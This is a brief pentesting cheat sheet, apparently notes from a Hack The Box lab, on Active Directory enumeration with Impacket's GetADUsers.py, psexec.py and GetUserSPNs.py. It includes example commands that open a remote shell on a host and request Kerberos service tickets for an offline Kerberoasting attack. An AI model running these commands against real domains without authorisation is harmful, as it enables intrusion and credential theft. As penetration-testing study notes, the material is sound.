Active Directory Enum - brief
GetADUsers.py
GetADUsers.py -all <target> -dc-ip <IP address of domain controller>
e.g.
GetADUsers.py -all active.htb/svc_tgs -dc-ip 10.10.10.100
psexec.py
Utilities like Telnet and remote control programs like Symantec's PC Anywhere let you execute programs on remote systems, but they can be a pain to set up and require that you install client software on the remote systems that you wish to access. PsExec is a light-weight telnet-replacement that lets you execute processes on other systems, complete with full interactivity for console applications, without having to manually install client software. PsExec's most powerful uses include launching interactive command-prompts on remote systems and remote-enabling tools like IpConfig that otherwise do not have the ability to show information about remote systems.
psexec.py <username>@<server>
e.g.
psexec.py active.htb/svc_tgs@10.10.10.100
GetUserSPNs.py
This module will try to find Service Principal Names that are associated with normal user accounts. Since normal account's password tend to be shorter than machine accounts, and knowing that a TGS request will encrypt the ticket with the acount the SPN is running under, this could be used for a n offline bruteforcing attack of the SPNs account NTLM hash if we can gather valid TGS for those SPNs. This is part of the kerberoast attack.
GetUsersSPNs.py -request -dc-ip 10.10.10.100 active.htb/svc_tgs
Last updated
